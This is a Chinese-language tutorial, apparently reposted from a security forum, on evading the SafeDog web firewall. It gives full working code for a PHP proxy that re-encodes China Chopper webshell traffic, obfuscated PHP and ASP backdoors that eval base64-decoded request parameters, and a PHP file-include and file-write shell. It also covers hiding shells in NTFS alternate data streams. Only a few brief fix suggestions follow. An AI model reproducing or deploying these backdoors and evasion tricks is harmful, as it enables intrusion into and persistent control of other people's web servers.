来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 0times;00 安全狗之菜刀的突破#原理:BAD: caidao - safedog -X- backdoorGOOD: caidao - middle - safedog - backdoor - middle - caidao菜刀发送的数据是会被安全狗拦截,因为菜刀的......
0×00 安全狗之菜刀的突破
#原理:
BAD: caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao
菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内
但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去
类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,数据流到服务器上的shell,shell把加密后的数据进行解密然后再执行,执行完后将数据返回给代理脚本,最终流回菜刀。
#代码
#middle.php
<?php /* * Author: Laterain * Time: 20130821 * About: Middle monkey between the hacker and safedog. * Just For Fun */ $url = isset($_GET['shell'])?$_GET['shell']:''; $pass= isset($_GET['pass'])?$_GET['pass']:''; $type= isset($_GET['type'])?$_GET['type']:'php'; if ($type == 'php') { $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));'); } elseif ($type == 'asp') { $shellcode = base64_encode($_POST[$pass]); } $shellcode = $pass.'='.urlencode($shellcode); foreach ($_POST as $key => $value) { if ($key == $pass) { continue; } $shellcode .= '&'.$key.'='.urlencode($value); } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode); $data = curl_exec($ch); curl_close($ch); print_r($data); ?> #php backdoor
<?php $key = "hack"; preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a'); ?>
#asp backdoor
<% OPTION EXPLICIT const BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" dim Base64EncMap(63) dim Base64DecMap(127) dim code '初始化函数 PUBLIC SUB initCodecs() ' 初始化变量 dim max, idx max = len(BASE_64_MAP_INIT) for idx = 0 to max - 1 Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1) next for idx = 0 to max - 1 Base64DecMap(ASC(Base64EncMap(idx))) = idx next END SUB 'Base64加密函数 PUBLIC FUNCTION base64Encode(plain) if len(plain) = 0 then base64Encode = "" exit function end if dim ret, ndx, by3, first, second, third by3 = (len(plain) \ 3) * 3 ndx = 1 do while ndx <= by3 first = asc(mid(plain, ndx+0, 1)) second = asc(mid(plain, ndx+1, 1)) third = asc(mid(plain, ndx+2, 1)) ret = ret & Base64EncMap( (first \ 4) AND 63 ) ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) ) ret = ret & Base64EncMap( ((second * 4) AND 60) + ((third \ 64) AND 3 ) ) ret = ret & Base64EncMap( third AND 63) ndx = ndx + 3 loop if by3 < len(plain) then first = asc(mid(plain, ndx+0, 1)) ret = ret & Base64EncMap( (first \ 4) AND 63 ) if (len(plain) MOD 3 ) = 2 then second = asc(mid(plain, ndx+1, 1)) ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) ) ret = ret & Base64EncMap( ((second * 4) AND 60) ) else ret = ret & Base64EncMap( (first * 16) AND 48) ret = ret '& "=" end if ret = ret '& "=" end if base64Encode = ret END FUNCTION 'Base64解密函数 PUBLIC FUNCTION base64Decode(scrambled) if len(scrambled) = 0 then base64Decode = "" exit function end if dim realLen realLen = len(scrambled) do while mid(scrambled, realLen, 1) = "=" realLen = realLen - 1 loop dim ret, ndx, by4, first, second, third, fourth ret = "" by4 = (realLen \ 4) * 4 ndx = 1 do while ndx <= by4 first = Base64DecMap(asc(mid(scrambled, ndx+0, 1))) second = Base64DecMap(asc(mid(scrambled, ndx+1, 1))) third = Base64DecMap(asc(mid(scrambled, ndx+2, 1))) fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1))) ret = ret & chr( ((first * 4) AND 255) + ((second \ 16) AND 3)) ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15)) ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63)) ndx = ndx + 4 loop if ndx < realLen then first = Base64DecMap(asc(mid(scrambled, ndx+0, 1))) second = Base64DecMap(asc(mid(scrambled, ndx+1, 1))) ret = ret & chr( ((first * 4) AND 255) + ((second \ 16) AND 3)) if realLen MOD 4 = 3 then third = Base64DecMap(asc(mid(scrambled,ndx+2,1))) ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15)) end if end if base64Decode = ret END FUNCTION ' 初始化 call initCodecs code = request("hack") code = base64Decode(code) eval code %> 0×01 安全狗之突破恶意代码拦截
原理:
php://input没有被检查,在这儿写恶意代码即可。
以ADS的方式上传了shell之后,包含即可。
base.php
<?php if (isset($_GET['inc'])) { include($_GET['inc']); } elseif (isset($_GET['path'])) { fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input")); } else { echo __FILE__; } ?> #修复建议:
1.因为有了middle的任意加密混淆与backdoor的对应解密,安全狗官方应该也很难解决拦截菜刀数据的问题,但是可以从backdoor入手,加强对服务器后门的扫描探测能有效的防止这个问题。
2.通过包含来获取shell,这就只有加强特征码了。
3.无法发现ADS创建的后门的问题,我的想法是,服务器自身是不允许访问ads创建的文件的,只能通过包含来访问,那么可以将include,require等里面带:的归为危险文件。当然能直接发现更好。
4.php://input内容过滤
PS:本来以为php://input是我最先发现的,但是昨天看见某某在freebuf上提到了这个的利用,我就被打击了。。。于是就发出来吧。。。
作者:laterain form 90sec
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com